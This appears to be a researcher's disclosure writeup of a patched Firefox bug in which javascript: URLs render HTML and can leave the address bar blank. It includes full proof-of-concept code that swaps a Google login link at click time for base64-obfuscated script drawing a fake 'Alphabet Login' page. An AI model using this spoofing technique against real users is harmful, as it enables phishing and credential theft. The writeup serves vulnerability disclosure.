FireFox Hide URL (FIXED)


The Javascript URL scheme in Firefox is quite peculiar than other browsers' implementation. For example, navigating to 'javascript:1' in Firefox causes the document to display the number '1'

This behavior is not seen in other browsers. The way it works is that Firefox checks if there is something returned, if so, it will display this text which is returned in the document. But what happens if we navigate to 'javascript:`<b>test</b>`'?
It will return that string and ultimately we will have a document with custom HTML rendered through javascript.
But, rendering HTML means we can render javascript within a javascript URL scheme by navigating to something like 'javascript:`<script>alert(/this works!/)</script>`'
Using the above, I stumbled upon a weird behavior where when certain javascript is used we can trick the browser into completely showing a blank address URL.

Original PoC code:


<html>
<head>
<title>FF-URL-hiding - @qab</title>
</head>
<body>
<a id='q' href='https://login.google.com/'>Click here</a>
<script>
var payload=btoa('<head><script>q=1;setTimeout($=>{location.reload()},12)<\/script></head>');
var payload2=('PGgyPldsZWNvbWUgdG8gQWxwaGFiZXQgTG9naW4hPC9oMj4KPHNjcmlwdD4KKGZ1bmN0aW9uKCkgey8vVGhpcyBpcyB0byBzZXQgdGhlIGZhdmljb24KICAgIHZhciBxID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbGluaycpOwogICAgcS50eXBlID0gJ2ltYWdlL3gtaWNvbic7CiAgICBxLnJlbCA9ICdzaG9ydGN1dCBpY29uJzsKICAgIHEuaHJlZiA9ICdodHRwOi8vd3d3Lmdvb2dsZS5jb20vZmF2aWNvbi5pY28nOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswXS5hcHBlbmRDaGlsZChxKTsKfSgpKTsKCndpbmRvdy5kb2N1bWVudC50aXRsZT0naHR0cHM6Ly9sb2dpbi5nb29nbGUuY29tLyc7CnNldFRpbWVvdXQocnI9Pntsb2NhdGlvbi5oYXNoPScnfSwxMCk7Cjwvc2NyaXB0Pg==');;
var ql='javascript:try{q}catch(e){document.write(atob("'+payload2+'"))};`<script>if(location!=this.location){q=window}else{document.write(atob("'+payload+'"))}<\/script>`';
q.addEventListener("click",$=>{q.href=ql;});//We replace the href right before the user clicks it.
</script>
</body>
</html>


I was able to find another bug using the javascript URI scheme whilst testing this bug which resulted in full URL spoof, writeup can be found here

References:

The Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1228754
Mozilla Foundation Security Advisory 2016-21: https://www.mozilla.org/en-US/security/advisories/mfsa2016-21/